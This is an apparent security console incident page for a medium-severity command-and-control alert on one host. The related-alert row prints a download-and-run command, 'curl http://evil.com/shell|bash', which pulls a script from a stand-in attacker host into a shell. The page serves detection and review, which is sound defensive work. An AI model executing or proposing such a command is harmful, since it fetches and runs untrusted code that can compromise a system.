Back to list

Medium CINC-20251220-A068DF82 new

Aggregate ID: aggind:021368f9220b45cdb2760a069897c1c8:13174456983

Incident Overview

Incident ID CINC-20251220-A068DF82
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-13 19:42:03
Last Seen 2025-12-13 19:42:03
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Command and Control
Techniques:
Ingress Tool Transfer

Affected Hosts (1)

localhost.localdomain

Related Alerts (1)

Severity Status Hostname Description Tactic Command Line Time
High new localhost.localdomain An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected. Command and Control /bin/sh -c curl http://evil.com/shell|bash 12-13 19:42